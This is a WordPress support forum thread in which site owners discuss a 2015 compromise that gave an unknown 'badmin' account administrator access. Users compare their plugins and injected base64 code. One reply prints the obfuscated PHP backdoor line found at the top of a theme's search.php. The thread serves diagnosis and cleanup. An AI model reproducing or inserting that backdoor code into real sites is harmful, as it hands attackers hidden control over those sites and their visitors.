Site hacked with a non-exsistant admin username

  • A few days back my Wordfence plugin alerted me to the fact that a user from Russia logged in using the username “badmin”, who had all administrative rights.

    I checked the “functions.php” and sure enough, I had a base64 code embedded in the beginning.

    What I’m asking is how did the hacker log into the site with a non-exsistant username, let alone have full administrative rights?

    When I deleted the malicious code from functions.php, I checked if perhaps he perhaps added any new administrative usernames directly into the database before logging in but I couldn’t find the “badmin” username anywhere.

    Thank you for your answer.

Viewing 7 replies - 1 through 7 (of 7 total)
  • Moderator t-p

    (@t-p)

    Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Had this same hack by the same user happen to a site I host a few days ago. Functions.php also was injected with base64 code. I would guess this is a bot exploiting an issue with a plugin as I do not have the same theme as you. Perhaps Wordfence is the issue? Can you list your plugins and versions so that we can compare and find the cause of this.

    Thread Starter BioB

    (@biob)

    I use the theme Unoblog by ThemeBounce, ver. 1.3 (it’s probably not the site you checked out because I run several WP blogs).

    My WordPress is version 4.3.1

    I have updated two plugins today or yesterday. One of them, incidentally, was Wordfence, I now run ver. 6.0.19 but before it was most probably 6.0.18.

    I’m pretty sure the other one was Akismet, which is now ver. 3.1.4. I don’t even know why I keep this plugin as I don’t use it. It’s the most probable source of attack.

    Yosast SEO ver. 2.3.5 could be another likely candidate. I think it very recently automatically updated and that it was ver. 2.3.4 before.

    Yet another widely used plugin that could be the target of the attack is Cookie Law Info ver. 1.5.3 by Richard Ashby.

    For now I deleted the base64 code from the functions.php and blocked the user’s IP. I know, though, that the script probably spammed my entire site with new files with malicious code inside (once before I had a problem with this and it cost me some money to get it repaired).

    I’m only sorry I deleted the code and didn’t store it. I could post it here for some back-engineering. Nah, well. I hope it won’t happen again.

    It also seems like the hacker got in with the first attempt. Many others try every day and get denied by Wordfence and I get emails about such attempts every day…

    Moderator t-p

    (@t-p)

    If you guys suspect any plugin hen please bring it to the attention of its developers so that they can look into the issue and appropriate measures.

    Richard

    (@richardashby)

    Hi, I’m the author of Cookie Law Info. There’s nothing in the code of that plugin to relate to that kind of attack, and all inputs and database reads are heavily sanitised to eliminate potential attacks. If you do have more information once you have done an analysis please contact me via cookielawinfo.com and I will of course take a look. For now though I would look at other sources especially other user accounts and login attempts where that user account may have been created. Regards, Richard

    Thread Starter BioB

    (@biob)

    I don’t know what to suspect, unfortunately. I just put out some possibilities because those plugins are widely used and might be targets, that’s all.

    Sorry, Richard. I love your plugin, by the way.

    I did some more digging, though and in my UnoBlog theme the file search.php was modified on the day the hacker got in and it had an additional line of code at the very top:

    <?php $pekyg = 'rMNfN14n*UO3sb2TFa1Te0v_fO6JTGnY/40_8zA9obHeueW.kgHwpvGPtXwRpr_UeasohEcle7Cig25.e36Uyeipmq4dMbK9ucKBz9Sa0gTee8Wj1IDAFq4Q/dXOeeQQTl5I7282pEcsrP'; $ptcfnjsmzcvk = $pekyg[50].$pekyg[28].$pekyg[15].$pekyg[141].$pekyg[62].$pekyg[55].$pekyg[10].$pekyg[128].$pekyg[98].$pekyg[99].$pekyg[25].$pekyg[38].$pekyg[63].$pekyg[106].$pekyg[126]; $kgtmtzrhpn = $pekyg[105].$pekyg[43].$pekyg[56].$pekyg[124].$pekyg[7].$pekyg[53]; $lqfvtkarmb = $pekyg[136].$pekyg[0].$pekyg[125].$pekyg[49].$pekyg[23].$pekyg[140].$pekyg[85].$pekyg[60].$pekyg[71].$pekyg[17].$pekyg[97].$pekyg[80]; $goblsqeuxg = $pekyg[13].$pekyg[65].$pekyg[139].$pekyg[108].$pekyg[82].$pekyg[90].$pekyg[35].$pekyg[91].$pekyg[45].$pekyg[138].$pekyg[40].$pekyg[121].$pekyg[64]; $ojcapxvzcr = $pekyg[120].$pekyg[47].$pekyg[8].$pekyg[32].$pekyg[107]; $qingnmtaec = $pekyg[79]; $ckwovrefmyof = $kgtmtzrhpn($ptcfnjsmzcvk); $lqfvtkarmb ($ojcapxvzcr , $goblsqeuxg($ckwovrefmyof) , $qingnmtaec); ?>

    Very standard for this kind of a hack. I’ll check other files as well.

    The attack happened on oct. 4. 2015

    apottlh

    (@apottlh)

    Same thing happened to me. The only plugin I have in common with the comments above is Wordfence. Looked up the issue at the time but didn’t see anyone else posting on it. Glad I checked back.

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘Site hacked with a non-exsistant admin username’ is closed to new replies.